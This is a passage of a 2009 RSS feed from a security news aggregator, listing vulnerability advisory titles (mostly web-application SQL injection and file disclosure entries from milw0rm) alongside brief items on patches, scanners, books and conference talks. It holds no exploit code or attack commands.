<item><title>Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability</title><description>2009-06-08 19:58:06 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107039.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107039.shtml</guid></item>
<item><title>MyCars Automotive Auth Bypass SQL Injection Vulnerability</title><description>2009-06-08 17:54:27 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106992.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106992.shtml</guid></item>
<item><title>VT-Auth 10 zHk8dEes3txt File Disclosure Vulnerability</title><description>2009-06-08 17:54:27 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106991.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106991.shtml</guid></item>
<item><title>fipsCMS Light 21 dbmdb Remote Database Disclosure Vulnerability</title><description>2009-06-08 17:54:27 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106990.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106990.shtml</guid></item>
<item><title>Joomla Component com_school 14 classid SQL Injection Vulnerability</title><description>2009-06-08 17:54:27 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106989.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106989.shtml</guid></item>
<item><title>Kloxo formerly Lxadmin Vulnerability Exploited, Mon, Jun 8th</title><description>2009-06-08 17:47:34 -       SANS Internet Storm Center, InfoCON green : We've had several readers Kirk being the first alert us to avulnerability in Klaxobeing exp more</description><link>http://www.secuobs.com/revue/news/106986.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106986.shtml</guid></item>
<item><title>Saint vulnerability scanner v6108 available</title><description>2009-06-07 23:36:51 - Security Database Tools Watch : SAINT is the Security Administrator's Integrated Network Tool It is usedto non-intrusively detect security vulnerabilities on any remotetarget, including servers, workstations, networking devices, and othertypes of nodes It will also gather information such as operatingsystem types and open ports The SAINT graphical user interfaceprovides access to SAINT's data management, scan configuration, scanscheduling, and data analysis capabilities through a web browserDifferent aspects of  - Security Tools / Saint, VulnerabilityScanner, Automated ExploiterIMAGE IMAGE IMAGE IMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/106738.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106738.shtml</guid></item>
<item><title>The Software Vulnerability Guide Programming Series</title><description>2009-06-07 05:29:25 - SecGuru   :    In today’s market, secure software is a must for consumers Manydevelopers, however, are not familiar with the techniques needed toproduce secure code or detect existing vulnerabilities The SoftwareVulnerability Guide focuses on the origin of most softwarevulnerabilities, including the bugs in the underlying software used todevelop IT infrastructures and the Internet Most of these securitybugs and the viruses, worms, and exploits that derive from themstarted out as programmer mistakes With this easy-to-use guide,professional programmers and testers will learn how to recognize andprevent these vulnerabilities before their software reaches themarket For each of the 30 common software vulnerabilities featuredthe authors provide a summary, description of how the vulnerabilityoccurs, and famous examples of how it has been used Tips on how tofind and fix the vulnerability in software are also provided alongwith source code snippets, commentary, tools, and techniques ineasy-to-read sidebars This guide is a must-have for today’s softwaredevelopers KEY FEATURES * Includes coding examples in a variety oflanguages, including C, C++, Java, VB, NET, scripting languages, andmore * Provides tips for uncovering vulnerabilities in a diverse arrayof systems, including what it may look like in code, and how theoffending code can be fixed * Covers vulnerabilities such aspermitting default or weak passwords, cookie poisoning, exchangingsensitive data in plain text, leaving things in memory, and formatstring attacks * Includes a CD-ROM with all of the source code, aswell as many freeware/shareware tools discussed in the bookIMAGEIMAGEIMAGE IMAGE IMAGE IMAGE IMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/106629.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106629.shtml</guid></item>
<item><title>Quicktime Vulnerability found by our VRT</title><description>2009-06-07 00:41:03 - Finshake : IMAGEI just wanted to throw up a quick blog post congratulating LureneGrenier of the Sourcefire’s Vulnerability Research Team Last week anupdate for Apple’s Quicktime and iTunes came out, and in it, lo andbehold was an update for CVE-2009-0956, a vulnerability in Quicktime’shandling of movie files So, I just wanted to congratulate her on thenice 0-day find Good jobLurene can also be found on Twitter</description><link>http://www.secuobs.com/revue/news/106597.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106597.shtml</guid></item>
<item><title>Vulnerability Assessment and Macintosh Forensics</title><description>2009-06-06 04:13:17 - Mac OS X Forensics : a new page discussing vulnerability scanning with the tool Nessus fromTenable Network Security</description><link>http://www.secuobs.com/revue/news/106477.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106477.shtml</guid></item>
<item><title>Pixelactivo 30 idx Remote SQL Injection Vulnerability</title><description>2009-06-05 22:46:34 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106394.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106394.shtml</guid></item>
<item><title>Pixelactivo 30 Auth Bypass Remote SQL Injection Vulnerability</title><description>2009-06-05 22:46:34 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106393.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106393.shtml</guid></item>
<item><title>Kjtechforce mailman b1 code SQL Injection Delete Row Vulnerability</title><description>2009-06-05 22:46:34 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/106392.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106392.shtml</guid></item>
<item><title>Epok begins Marketing Vulnerability Analysys Tool Developed for NSA and DHS</title><description>2009-06-05 15:39:25 - Security Bloggers Network : A vulnerability analysis tool used by the National Security Agency NSAand US Department of Homeland Security is now commercially availablefor enterprises that want to either make sense of their Read therest of the story here</description><link>http://www.secuobs.com/revue/news/106216.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106216.shtml</guid></item>
<item><title>On Approaches and Tools for Automated Vulnerability Analysis PPTX</title><description>2009-06-05 13:41:22 - Reverse Engineering : submitted by rolfrlink 0 comments</description><link>http://www.secuobs.com/revue/news/106187.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106187.shtml</guid></item>
<item><title>Host Directory PRO 210 Remote Database Backup Vulnerability</title><description>2009-06-04 19:36:34 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105882.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105882.shtml</guid></item>
<item><title>Web Directory PRO Remote Database Backup Vulnerability</title><description>2009-06-04 19:36:34 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105881.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105881.shtml</guid></item>
<item><title>RIM patches BlackBerry PDF vulnerability</title><description>2009-06-04 04:05:10 - Hack In The Box : Research in Motion RIM has issued a new security patch for BlackBerryEnterprise Server to fix vulnerabilities in its PDF distiller programThe patch was issued on a BlackBerry forum last week and was billed asa fix for any customers that use BlackBerry Enterprise Server BESversions 41 through 50 RIM said that there were âmultiplesecurity vulnerabilitiesâ that existed in some versions of theenterprise serversâ PDF distiller that were released as part of theBlackBerry Attachment Service The vulnerabilities could allow hackersto send users e-mails containing a âspecifically crafted PDF fileâthat could cause memory corruption and âpossibly lead to arbitrarycode executionâ of the computer hosting the attachment service</description><link>http://www.secuobs.com/revue/news/105651.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105651.shtml</guid></item>
<item><title>OCS Inventory NG 102 Remote File Disclosure Vulnerability</title><description>2009-06-04 00:37:19 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105600.shtml</guid></item>
<item><title>Supernews 26 indexphp noticia Remote SQL Injection Vulnerability</title><description>2009-06-04 00:37:19 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105599.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105599.shtml</guid></item>
<item><title>Joomla Omilen Photo Gallery 05b Local File Inclusion Vulnerability</title><description>2009-06-04 00:37:19 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105598.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105598.shtml</guid></item>
<item><title>Movie PHP Script 20 initphp anticode Code Execution Vulnerability</title><description>2009-06-04 00:37:19 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105597.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105597.shtml</guid></item>
<item><title>BlackBerry maker warns on security vulnerability</title><description>2009-06-03 23:13:02 - Computer Security News :    BlackBerry maker Research in Motion Ltd has issued a security patchfor the popular device, whose users include President Barack Obama,warning that it is vulnerable to attacks by hackers</description><link>http://www.secuobs.com/revue/news/105578.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105578.shtml</guid></item>
<item><title>My Mini Bill orderid Remote SQL Injection Vulnerability</title><description>2009-06-03 18:01:37 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105459.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105459.shtml</guid></item>
<item><title>EgyPlus 7ml = 101 Auth Bypass SQL Injection Vulnerability</title><description>2009-06-03 18:01:37 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105458.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105458.shtml</guid></item>
<item><title>Vuln: Microsoft Windows Desktop Wall Paper System Parameter Local Denial Of Service Vulnerability</title><description>2009-06-03 17:30:29 - ReverseConnection :  Microsoft Windows Desktop Wall Paper System Parameter Local Denial OfService Vulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/105421.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105421.shtml</guid></item>
<item><title>Vuln: OpenSC ‘pkcs11-tool’ Inseure Key Generation Vulnerability</title><description>2009-06-03 12:42:39 - ReverseConnection :  OpenSC ‘pkcs11-tool’ Inseure Key Generation Vulnerability Source: clickhere</description><link>http://www.secuobs.com/revue/news/105326.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105326.shtml</guid></item>
<item><title>Vuln: PHP-Nuke Downloads Module ‘query’ Parameter Cross Site Scripting Vulnerability</title><description>2009-06-03 05:15:29 - ReverseConnection :  PHP-Nuke Downloads Module ‘query’ Parameter Cross Site ScriptingVulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/105212.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105212.shtml</guid></item>
<item><title>Vuln: Podcast Generator ‘core/admin/deletephp’ Arbitrary File Deletion Vulnerability</title><description>2009-06-03 05:15:29 - ReverseConnection :  Podcast Generator ‘core/admin/deletephp’ Arbitrary File DeletionVulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/105208.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105208.shtml</guid></item>
<item><title>Vuln: Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability</title><description>2009-06-03 05:15:29 - ReverseConnection :  Apache Tomcat mod_jk Content Length Information Disclosure VulnerabilitySource: click here</description><link>http://www.secuobs.com/revue/news/105206.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105206.shtml</guid></item>
<item><title>Bugtraq: TPTI-09-04: Apple Terminal xterm Resize Escape Sequence Memory Corruption Vulnerability</title><description>2009-06-03 05:15:29 - ReverseConnection :  TPTI-09-04: Apple Terminal xterm Resize Escape Sequence MemoryCorruption Vulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/105205.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105205.shtml</guid></item>
<item><title>Bugtraq: CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability</title><description>2009-06-03 05:15:29 - ReverseConnection :  CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointerVulnerability Source: click here Powered by Reverse-Connectioncom</description><link>http://www.secuobs.com/revue/news/105204.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105204.shtml</guid></item>
<item><title>WebEyes Guest Book v3 yorumasp mesajid SQL Injection Vulnerability</title><description>2009-06-03 00:12:00 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105128.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105128.shtml</guid></item>
<item><title>AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability</title><description>2009-06-02 19:44:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105039.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105039.shtml</guid></item>
<item><title>WebCal webCal3_detailasp event_id SQL Injection Vulnerability</title><description>2009-06-02 19:44:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/105037.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105037.shtml</guid></item>
<item><title>Vuln: IBM WebSphere MQ Remote Buffer Overflow Vulnerability</title><description>2009-06-02 19:29:18 - ReverseConnection :  IBM WebSphere MQ Remote Buffer Overflow Vulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/105013.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/105013.shtml</guid></item>
<item><title>US-CERT Releases Vulnerability Summary Week of May 25, 2009</title><description>2009-06-02 17:24:45 - Infosecurity.US :  The United States Computer Emergency Readiness Team US-CERT hasreleased their ubiquitous weekly summary document, entitledappropriately enough US-CERT Cyber Security Bulletin SB09-152 —Vulnerability Summary for the Week of May 25, 2009 Detailing datasecurity issues that reared up during that week, we deem the report aweekly MustRead compilation You can view the </description><link>http://www.secuobs.com/revue/news/104986.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104986.shtml</guid></item>
<item><title>ecsportal rel 65 article_view_photophp id SQL Injection Vulnerability</title><description>2009-06-01 23:56:10 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104578.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104578.shtml</guid></item>
<item><title>PAD Site Scripts 36 Remote Arbitrary Database Backup Vulnerability</title><description>2009-06-01 23:56:10 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104576.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104576.shtml</guid></item>
<item><title>AdaptBB 10 forumspath Remote File Inclusion Vulnerability</title><description>2009-06-01 23:56:10 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104575.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104575.shtml</guid></item>
<item><title>ASP Football Pool 23 Remote Database Disclosure Vulnerability</title><description>2009-06-01 23:56:10 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104574.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104574.shtml</guid></item>
<item><title>Open-school 10 id Remote SQL Injection Vulnerability</title><description>2009-06-01 19:26:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104488.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104488.shtml</guid></item>
<item><title>Escon SupportPortal Pro 30 tid Blind SQL Injection Vulnerability</title><description>2009-06-01 19:26:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/104487.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104487.shtml</guid></item>
<item><title>Microsoft DirectShow Vulnerability</title><description>2009-06-01 17:46:46 - About.com Internet   Network Security : A vulnerability in Microsoft DirectShow is reportedly being exploited inthe wild Microsoft has issued a security advisory for the flaw971778 The affected code was removed in more recent</description><link>http://www.secuobs.com/revue/news/104445.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104445.shtml</guid></item>
<item><title>Vuln: OpenSSL ‘zlib’ Compression Memory Leak Remote Denial of Service Vulnerability</title><description>2009-06-01 16:46:22 - ReverseConnection :  OpenSSL ‘zlib’ Compression Memory Leak Remote Denial of ServiceVulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/104413.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104413.shtml</guid></item>
<item><title>Slides for “Vulnerability Discovery in Closed Source/Encrypted PHP Applications”</title><description>2009-05-31 17:21:45 - Suspekt... : Two days ago I presented my session about bytecode encrypted PHPapplications and how to find vulnerabilities in them at 25C3 I didn’tupload the slides until now, because I got ill during the night aftermy talk and therefore spent most of yesterday in my hotelroom Buthere are the slides Session: Vulnerability Discovery in </description><link>http://www.secuobs.com/revue/news/103910.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103910.shtml</guid></item>
<item><title>Some facts about the PHPList vulnerability and the phpbbcom hack</title><description>2009-05-31 17:21:45 - Suspekt... : A few days ago phpbbcom was hacked through a super-globals-overwritevulnerability in PHPList that was used by an attacker for a local fileinclusion exploit Details about the whole attack, written down bysomeone who claims to be the attacker, can be read here From theexplanation it seems that the PHP installation on phpbbcom </description><link>http://www.secuobs.com/revue/news/103908.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103908.shtml</guid></item>
<item><title>SCTP Linux Kernel Vulnerability Assessment and Reproduction</title><description>2009-05-31 16:44:35 - Accuvant Insight : Overview: The blog post here makes statements about a vulnerability inthe Linux kernel handling of SCTP data The primary point of the postis to show how a vulnerability that was once thought to be of arelative low risk was incorrectly assessed and it can provide a 3rdparty remote access to a server </description><link>http://www.secuobs.com/revue/news/103790.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103790.shtml</guid></item>
<item><title>Vulnerability Management in an Application Security World SnowFROC Video Tutorial</title><description>2009-05-30 18:46:18 - SecurityTube.Net : Vulnerability Management in an Application Security World SnowFROCVideo TutorialIMAGE</description><link>http://www.secuobs.com/revue/news/103585.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103585.shtml</guid></item>
<item><title>Arab Portal 22 Auth Bypass Remote SQL Injection Vulnerability</title><description>2009-05-30 13:45:00 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103515.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103515.shtml</guid></item>
<item><title>ZeusCart = 23 maincatid SQL Injection Vulnerability</title><description>2009-05-30 13:45:00 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103514.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103514.shtml</guid></item>
<item><title>Million Dollar Text Links = 10 id SQL injection Vulnerability</title><description>2009-05-30 13:45:00 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103513.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103513.shtml</guid></item>
<item><title>Traidnt Up 20 Auth Bypass / Cookie SQL Injection Vulnerability</title><description>2009-05-30 13:45:00 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103512.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103512.shtml</guid></item>
<item><title>Vuln: Adobe Acrobat Stack Exhaustion Denial of Service Vulnerability</title><description>2009-05-30 13:29:52 - ReverseConnection :  Adobe Acrobat Stack Exhaustion Denial of Service Vulnerability Source:click here</description><link>http://www.secuobs.com/revue/news/103497.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103497.shtml</guid></item>
<item><title>Joomla Component JVideo 03x SQL Injection Vulnerability</title><description>2009-05-30 05:21:03 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103391.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103391.shtml</guid></item>
<item><title>Webboard = v290 beta Remote File Disclosure Vulnerability</title><description>2009-05-30 05:21:03 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103389.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103389.shtml</guid></item>
<item><title>Zen Help Desk 21 Auth Bypass SQL Injection Vulnerability</title><description>2009-05-30 05:21:03 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/103387.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103387.shtml</guid></item>
<item><title>Vulnerability in Direct X Actively Being Used in Drive-By Hacking</title><description>2009-05-30 05:12:29 - Security Bloggers Network : A vulnerability involving a Direct X component of Microsoft’s WindowsQuickTime Parser is facilitating current drive-by hacking incidentsIt is reported that the vulnerability is automatically being activatedwithout user intervention when a user simply browses a website thatcontains a maliciously crafted QuickTime file and can provide thehacker with complete control over the compromised PC Windows </description><link>http://www.secuobs.com/revue/news/103377.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103377.shtml</guid></item>
<item><title>Vuln: SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’ Remote Format String Vulnerability</title><description>2009-05-30 05:04:14 - ReverseConnection :  SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’ Remote Format StringVulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/103361.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103361.shtml</guid></item>
<item><title>Bugtraq: Re: InterN0T Achievo 134 - XSS Vulnerability</title><description>2009-05-30 05:04:14 - ReverseConnection :  Re: InterN0T Achievo 134 - XSS Vulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/103359.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103359.shtml</guid></item>
<item><title>Vuln: Linksys WAG54G2 Web Management Console Remote Arbitrary Shell Command Injection Vulnerability</title><description>2009-05-30 05:04:14 - ReverseConnection :  Linksys WAG54G2 Web Management Console Remote Arbitrary Shell CommandInjection Vulnerability Source: click here</description><link>http://www.secuobs.com/revue/news/103357.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103357.shtml</guid></item>
<item><title>NSA Cauldron Now In Private Sector Vulnerability Analysis Recipe</title><description>2009-05-29 23:18:00 - Infosecurity.US :  News, of the United States National Security Agency’s CAULDRON securitytool move into private practice… The vulnerability research productsystem has now moved into the private sector Originally developed byresearchers at George Mason University under contract to the Agencyand United States Air Force Essentially, the product is avulnerability aggregator, correlating output from </description><link>http://www.secuobs.com/revue/news/103252.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/103252.shtml</guid></item>

 </channel>
</rss>
